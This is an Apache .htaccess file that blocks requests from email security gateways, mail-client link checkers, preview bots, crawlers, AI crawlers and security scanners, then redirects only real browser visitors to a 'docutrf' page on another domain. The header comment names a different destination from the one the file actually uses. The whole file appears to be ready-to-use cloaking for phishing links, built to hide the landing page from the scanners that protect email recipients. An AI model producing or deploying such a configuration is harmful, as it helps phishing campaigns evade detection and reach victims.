# ============================================================
#  Real-Visitors-Only Redirect to www.hugot.com
#  Blocks ALL bots, crawlers, email scanners, link preview bots.
#  Only real browser users get redirected.
# ============================================================

Options -Indexes
ServerSignature Off

RewriteEngine On

# --- Allow access to getlink.php only ---
RewriteRule ^getlink\.php$ - [L]

# --- Block empty or missing User-Agents ---
RewriteCond %{HTTP_USER_AGENT} ^-?$
RewriteRule ^ - [F,L]

# --- Block email client bots & link scanners ---
RewriteCond %{HTTP_USER_AGENT} (Googlebot-Image|Google-Read-Aloud|Google-Apps-Script|GoogleImageProxy|YahooMailProxy|Yahoo\ Mail|Outlook|Microsoft\ Office|ms-office|SkypeUriPreview|msnbot-media|Bingbot|bingpreview|Proofpoint|Mimecast|Barracuda|IronPort|Symantec|MessageLabs|Sophos|Forcepoint|Cloudmark|SpamAssassin|Apple-PubSub|AppleMail|Mail\.Ru|mailchimp|sendgrid|mailgun|constantcontact|campaignmonitor|klaviyo|marketo|hubspot|pardot|eloqua) [NC]
RewriteRule ^ - [F,L]

# --- Block social & link-preview bots ---
RewriteCond %{HTTP_USER_AGENT} (facebookexternalhit|Facebot|Twitterbot|WhatsApp|TelegramBot|LinkedInBot|Slackbot|Discordbot|Applebot|vkShare|Pinterestbot|Iframely|Embedly|Baiduspider|YandexBot|Googlebot|bingbot|msnbot|DuckDuckBot|Sogou|Exabot|ia_archiver|archive\.org|AhrefsBot|SemrushBot|MJ12bot|DotBot|RogerBot|Gigabot|CCBot|GPTBot|anthropic-ai|Claude-Web|cohere-ai|PetalBot|proximic|Brandwatch|serpstat|Majestic|LinkdexBot|spbot|Sistrix|BLEXBot|DataProvider|scrapy|python-requests|python-urllib|Go-http-client|libwww-perl|wget|curl|Java|HTTrack|WebCopier|SiteSucker|offline|Nuclei|zgrab|masscan|nikto|sqlmap|nmap|dirbuster) [NC]
RewriteRule ^ - [F,L]

# --- Only allow real browsers ---
RewriteCond %{HTTP_USER_AGENT} !Mozilla [NC]
RewriteRule ^ - [F,L]

RewriteCond %{HTTP_USER_AGENT} !(Chrome|Firefox|Safari|Edge|Opera|Trident|OPR) [NC]
RewriteRule ^ - [F,L]

# --- Redirect real visitors to destination ---
RewriteRule ^ https://laexhibits.com/docutrf [R=301,L]

# --- Block sensitive files ---
<FilesMatch "\.(env|log|sql|bak|sh|py|rb)$">
    Order allow,deny
    Deny from all
</FilesMatch>
